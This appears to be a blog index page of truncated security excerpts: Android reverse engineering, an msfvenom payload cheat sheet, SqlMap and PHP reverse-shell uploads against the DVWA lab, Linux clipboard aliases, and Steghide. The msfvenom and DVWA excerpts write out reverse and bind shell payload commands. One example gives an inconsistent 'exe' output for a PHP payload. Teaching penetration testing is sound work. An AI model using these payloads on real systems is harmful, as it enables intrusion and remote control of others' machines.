CyberSecurityArc

Very first rule of the security is to never trust the security on the client-side in context of Android mobile app. The Client-side is not an environment we control and thus we should not rely on it by hard-coding or storing secrets that can disrupt our system. So the best way to secure your apps and do not getting caught by developers and hackers is to reverse engineer the application by yourself and fix the issues if possible.   Many Android developers fail to realize that the Android app they build can be easily reverse engineered. If you are one of them developers who think hard-coding secret keys or even storing it in gradle file will prevent it from going into the hands of hackers or other developers, you are wrong. So, let’s get started. For reverse engineering an application, we would need a few things beforehand — Java Decompiler Tool (I used JD-JUI in this article) to view the decompiled code. dex2jar utility  APK of the application. Basic understanding of the Andro...

msfvenom is a Metasploit standalone payload generator.  Also a replacement for msfpayload and msfencode. List switches/options $ msfvenom --help   List all payloads/ modules  $ msfvenom -l or list <type> Here Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all Binaries Payloads: Linux Meterpreter Reverse Shell $ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f elf > shell.elf Linux Bind Meterpreter Shell $ msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > bind.elf Linux Bind Shell $ msfvenom -p generic/shell_bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > term.elf Windows Meterpreter Reverse TCP Shell $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe Windows x64 Meterpreter Reverse TCP Shell $ msfvenom -p wi...

Automate SQL Injection Exploitation with SqlMap - Damn Vulnerable Web App ( DVWA) What is a SQL Injection? SQL injection is a technique often used to attack data driven applications. SQL injection is considered a high risk vulnerability due to the fact that can lead to full compromise of the web application. This is why in almost all web application penetration testing engagements, the applications are always checked for SQL injection flaws. A general and simple definition of when an application is vulnerable to SQL injection is when the application allows you to interact with the database and to execute queries on the database then it is vulnerable to SQL injection attacks. This is done by crafted parameter/statements passed as input (HTML form) in an attempt to get the website to pass a newly formed SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a vulnerability in an web application's code....

 Exploiting a Web Server - Using msfvenom generated PHP Web Payload  This exploit uses some of the file upload functions of the DVWA web site to demonstrate how to hack through the site itself. A hacker would use this type of vulnerability to gain access to web applications, servers, and data. We will start by creating a pre-prepared PHP code that we will upload to the web server through the upload functionality provide by DVWA.  For this exercise, I hosted DVWA application in XAMPP on my host operating system. I will generate PHP code using msfvenom on Kali Linux which is hosted/run on oracle VBOX. On the Kali Linux, run the following command to generate PHP Web Payload: $ msfvenom -p php/meterpreter/reverse_tcp LHOST=<Local IP>  LPORT=<Local Port>  -f raw > phpshell.php For example, $ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 -f exe > phpshell.exe Here, 192.168.0.2 is a IP Address of Kali Server It will generate fo...

How To I mitate (Replicate ) pbcopy And pbpaste Commands On Linux pbcopy  on a mac enables you to copy the standard input from terminal window to your clipboard enabling you to paste it to other applications.  This functionality is not   available  by default on  Ubuntu / Linux  but can be easily imitate using  available Linux commands You can  imitate  pbcopy and  pbpaste     on ubuntu/linux by using similar tool called  xclip which does exactly the same.  However its syntax is a little complicated  it required more options/switches. So,  I am going to  imitate  it with  pbcopy and pbpaste command. Fortunately, OS X and Linux *nix based we can make use of the The alias c ommand to replicate the pbcopy and pbpaste functionality in ubuntu/linux. If you haven’t previously installed xclip simply run the following command in your terminal:    $  sudo apt-get install xclip -y Edit y...

Steganography using STEGHIDE In this post, we will learn about "STEGHIDE". There are various steganography tools available in the digital world but, the differentiation between them are that it uses a variety of algorithms to encrypt the data. Moreover, Steghide supports to hide data behind any image(jpg/jpeg/png/gif/bmp), audio (mp3/wav), excel, etc. What is " Steganography"? Steganography comprised of two Greek words: steganos meaning "covered" and graphein meaning "to write" that means  "sheltered writing" or "concealed writing". It is a method that attempts  to hide the existence of message or communication. This idea of data hiding is not new; it has been used for centuries all across the world under different regimes .   In digital steganography, electronic communications may incorporate steganographic coding inside of a transport layer, such as a document file, picture file, program etc. Message of communication origina...